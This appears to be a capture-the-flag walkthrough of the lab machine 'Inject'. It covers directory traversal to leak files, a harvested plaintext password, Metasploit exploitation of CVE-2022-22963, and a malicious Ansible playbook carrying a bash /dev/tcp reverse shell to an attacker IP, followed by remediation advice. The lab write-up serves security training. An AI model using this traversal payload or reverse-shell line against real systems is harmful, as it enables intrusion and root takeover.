Inject (active at the time)
Today, we're diving deep into an intriguing analysis of 'Inject', a Linux machine that covers a unique landscape, complete with a website offering file upload capabilities.

So we're going to be exploring 'Inject', an Easy Difficulty Linux machine posing an engaging challenge. It features a website with a hidden twist: a Local File Inclusion (LFI) vulnerability embedded within its file upload function.
As we pierce this vulnerability, we uncover a file system laden with secrets. The key revelation? The web application runs a specific Spring-Cloud-Function-Web module, susceptible to the notorious CVE-2022-22963 vulnerability.
Our journey through Inject leads us to breach initial defenses as the 'frank' user, with further exploration revealing a plaintext password for 'phil'. The crowning glory comes from exploiting a cronjob running on the machine. Executing a malicious Ansible playbook, we seize control with a reverse shell as the root user.
Lets start by scanning the IP address we're given: 10.129.38.162
10.129.38.162
// PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
| 256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_ 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open nagios-nsca Nagios NSCA
|_http-title: Home
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Looks like there's only 2 ports open on this machine. Since http is running on port 8080, I'm going to visit that in the browser.

There aren't a lot of functions available on the site and sign up is under construction. Upload has a file upload function that seems to be working. I'll try it out before fuzzing for directories.

Trying to upload a few different file types with some reverse shell scripts and extension spoofing but we keep getting yelled at.

Image Upload.
After finding an image we can upload, we're given an Uploaded!
message and a link to view our image.


Possible Foothold
The url looks interesting. In this URL, the parameter img=Cat03.jpg
suggests that the server is using this input to determine which image to display. If the server-side code does not properly sanitize and validate this input, it might be possible to manipulate it to access unintended files. Let's keep digging in this direction. I'm going to fire up Burp Suite and capture my request with the directory traversal payload http://<targetip>:8080/show_image?img=../../../../../../etc/passwd

// <snip>
root:x:0:0:root:/root:/bin/bash
frank:x:1000:1000:frank:/home/frank:/bin/bash
phil:x:1001:1001::/home/phil:/bin/bash
_laurel:x:997:996::/var/log/laurel:/bin/false
<snip>
Awesome. /etc/passwd was leaked so it looks like we have LFI here, or Local File Inclusion. Local File Inclusion (LFI) is a vulnerability that allows an attacker to read and sometimes execute files on the server through manipulated input, often exploiting poorly implemented or unsanitized user input. This can lead to unauthorized access to sensitive information, potential system takeover, and execution of malicious code, significantly compromising the security and integrity of the affected system.
I did try searching for ssh keys but was unlucky there. So lets have a look through some user directories using the LFI vulnerability we've discovered. I like to do this from Burp Suites repeater function so that I'm not rate-Iimited.
I obviously can't dump the root user directory, but can find the user flag in Phil's home directory.

We're on the right track with that flag but there's nothing else here. Let's move onto Frank. There's a non-standard directory there so I'll keep digging there.

Interesting. Frank has credentials for the user Phil in an xml file and what appears to be the location of rsa keys which I tried to dump ealier but failed. Trying again for good measure but no such luck. Let's keep digging around.
// https://maven.apache.org/xsd/maven-4.0.0.xsd">
<servers>
<server>
<id>Inject</id>
<username>phil</username>
<password>DocPhillovestoInject123</password>
<privateKey>${user.home}/.ssh/id_dsa</privateKey>
<filePermissions>660</filePermissions>
<directoryPermissions>660</directoryPermissions>
<configuration></configuration>
</server>
</servers>
</settings>
We know we're working with a web app so lets head over to the web root directory. Looks like another non-standard directory. Let's dig!

After a bit of poking around in the /WebApp directory and a lot of reading I found another .xml file. pom.xml had some interesting information including frameworks and version numbers.

A quick search returned quite a few hits for a Spring Cloud Function RCE vulnerability

Time to fire up metasploit to see if we can do this quickly and search for an exploit.

Found one that looks pretty promising and with that we got a shell as frank and was able to quickly migrate over to user phil and grab the user.txt flag.
// meterpreter > shell
Process 3770 created.
Channel 1 created.
whoami
frank
su phil
Password: DocPhillovestoInject123
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
<SNIP>
cd home
ls
frank
phil
cd phil
ls
user.txt
cat user.txt
fb5<..snip..>959
After a bit more research into some other exploits (in the event metasploit didn't turn anything up) I found a few python scripts and manual exploits that can be run in burp suite.
Time to priv-esc
Looking for a path to priv-esc I'll move over linpeas and pspy. Starting with pspy though, I'll move the binary over from my machine to this box.
// wget http://<yourip>:8000/pspy64
--2023-06-29 22:20:12-- http://10.10.17.139:8000/pspy64
Connecting to 10.10.17.139:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
Make sure to modify permissions so we can execute: chmod +x pspy64

// CMD: UID=0 PID=6369 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1688077564.006593-6348-44552493765587/AnsiballZ_systemd.py
CMD: UID=0 PID=6370 |
CMD: UID=0 PID=6371 |
CMD: UID=0 PID=6372 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
CMD: UID=0 PID=6373 | /bin/sh -c /bin/sh -c 'rm -f -r /root/.ansible/tmp/ansible-tmp-1688077564.006593-6348-44552493765587/ > /dev/null 2>&1 && sleep 0'
CMD: UID=0 PID=6374 | rm -f -r /root/.ansible/tmp/ansible-tmp-1688077564.006593-6348-44552493765587/
CMD: UID=0 PID=6375 | /bin/sh -c rm -f -r /root/.ansible/tmp/ansible-tmp-1688077564.006593-6348-44552493765587/ > /dev/null 2>&1 && sleep 0
CMD: UID=0 PID=6378 | /usr/bin/rm -rf /opt/automation/tasks/playbook_1.yml
CMD: UID=0 PID=6379 | /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
CMD: UID=0 PID=6388 | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml
CMD: UID=0 PID=6387 |
CMD: UID=0 PID=6386 | sleep 10
CMD: UID=0 PID=6385 | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml
CMD: UID=0 PID=6384 | /bin/sh -c /usr/bin/rm -rf /var/www/WebApp/src/main/uploads/*
CMD: UID=0 PID=6383 | /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
CMD: UID=0 PID=6382 | /usr/sbin/CRON -f
CMD: UID=0 PID=6381 | /usr/sbin/CRON -f
CMD: UID=0 PID=6380 | /usr/sbin/CRON -f
CMD: UID=0 PID=6389 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
CMD: UID=0 PID=6391 |
CMD: UID=0 PID=6392 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
CMD: UID=0 PID=6393 |
CMD: UID=0 PID=6395 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
CMD: UID=0 PID=6396 |
CMD: UID=0 PID=6397 | /bin/sh -c /bin/sh -c 'echo ~root && sleep 0'
CMD: UID=0 PID=6398 | sleep 0
CMD: UID=0 PID=6399 |
CMD: UID=0 PID=6400 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" && echo ansible-tmp-1688077682.6851177-6395-137338149153431="` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" ) && sleep 0
CMD: UID=0 PID=6403 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" && echo ansible-tmp-1688077682.6851177-6395-137338149153431="` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" ) && sleep 0
CMD: UID=0 PID=6401 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" && echo ansible-tmp-1688077682.6851177-6395-137338149153431="` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" ) && sleep 0
CMD: UID=0 PID=6405 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" && echo ansible-tmp-1688077682.6851177-6395-137338149153431="` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" ) && sleep 0
CMD: UID=0 PID=6407 | sleep 0
CMD: UID=0 PID=6408 |
CMD: UID=0 PID=6409 | /bin/sh -c chmod u+x /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431/ /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431/AnsiballZ_setup.py && sleep 0
CMD: UID=0 PID=6410 | chmod u+x /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431/ /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431/AnsiballZ_setup.py
CMD: UID=0 PID=6411 | sleep 0
CMD: UID=0 PID=6412 |
CMD: UID=0 PID=6413 | /bin/sh -c /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431/AnsiballZ_setup.py && sleep 0
CMD: UID=0 PID=6414 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431/AnsiballZ_setup.py
CMD: UID=0 PID=6415 |
CMD: UID=0 PID=6418 | file -b /usr/bin/python3.8
Knowing all this lets take a look at the yaml file located at /opt/automation/tasks/playbook_1.yml
and see what it's doing.
phil@inject:~$ cat /opt/automation/tasks/playbook_1.yml
cat /opt/automation/tasks/playbook_1.yml
- hosts: localhost
tasks:
- name: Checking webapp service
ansible.builtin.systemd:
name: webapp
enabled: yes
state: started
This Ansible playbook is designed to check the status of a service named "webapp" on the local host.
The playbook contains one task: "Checking webapp service". This task uses the "ansible.builtin.systemd" module, which is a module in Ansible for managing systemd service units.
The parameters given to the systemd module in this playbook are:
name: webapp
: This is the name of the service that this task will manage. In this case, it's a service named "webapp".enabled: yes
: This parameter ensures the service is enabled to start at boot.state: started
: This parameter ensures the service is currently running. If the service is not running, Ansible will start it.
Overall, the playbook ensures that the "webapp" service is both enabled to start at boot and currently running on the localhost. If it's not running when the playbook is executed, Ansible will start the service.
phil@inject:~$ ls -la /opt/automation/tasks
ls -la /opt/automation/tasks
total 12
drwxrwxr-x 2 root staff 4096 Jul 5 20:16 .
drwxr-xr-x 3 root root 4096 Oct 20 2022 ..
-rw-r--r-- 1 root root 150 Jul 5 20:16 playbook_1.yml
phil@inject:~$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
Looking at permissions (above) for the directory and the yaml, the directory is accessible to root and staff, yaml only to root. Phil is part of the staff user group however. According to what we've learned above, the cronjob is executing all yaml files in the /opt/automation/tasks
directory. We know that we're using the ansible.builtin.systemd
module in the playbook above and after some searching we'd find that ansible also has a shell
module. Let's write a new yaml using the same structure to trigger a reverse shell.
- hosts: localhost
tasks:
- name: rev
shell: bash -c 'bash -i >& /dev/tcp/<YOUR_IP>/4445 0>&1'
Lets save this as playbook2.yml
, start up our listener, and copy the file to the /opt/automation/tasks
directory.
nc -lvnp 4445
cp playbook2.yml /opt/automation/tasks
Depending on when you moved the file over you might have to wait a minute or two for the cronjob to fire again and send you a shell.
After a few seconds we get our shell as root on our listener.
┌──(sx0tt㉿1337)-[~]
└─$ nc -vlnp 4445
listening on [any] 4445 ...
connect to [10.10.17.139] from (UNKNOWN) [10.129.38.162] 33038
bash: cannot set terminal process group (3594): Inappropriate ioctl for device
bash: no job control in this shell
root@inject:/opt/automation/tasks# ls
ls
playbook_1.yml
root@inject:/opt/automation/tasks# cat /root/root.txt
cat /root/root.txt
3c7<....snip....>c817
Remediation Recommendations
Finding: Local File Inclusion (LFI) vulnerability on the web server exposing user credentials and Spring Cloud version numbers
Priority: Critical
Path Traversal Prevention: Implement mechanisms to prevent path traversal (such as "../") that allow the web application to access directories outside of the intended scope. This can be accomplished by maintaining a whitelist of acceptable paths or implementing a robust filter for unacceptable input.
File Permissions: Reevaluate and tighten the file permissions on the web server. Sensitive files such as those containing user credentials should not be readable by the web server process.
Data Encryption: Encrypt sensitive data like user credentials, and only decrypt this information when necessary. Avoid storing plaintext credentials, using secure methods such as one-way hashes with a salt.
Software Version Management: Conceal version information for software like Spring Cloud. Detailed version information may be used by attackers to exploit known vulnerabilities associated with specific versions.
Regular Updates & Patch Management: Keep all systems, applications, and plugins updated with the latest patches. Regularly update your Spring Cloud and other frameworks, as new versions often include security enhancements and vulnerability fixes.Finding: Reverse shell payload execution using an Ansible playbook due to directory ownership by a privileged userFinding: Reverse shell payload execution using an Ansible playbook due to directory ownership by a privileged userFinding: Reverse shell payload execution using an Ansible playbook due to directory ownership by a privileged user
Last updated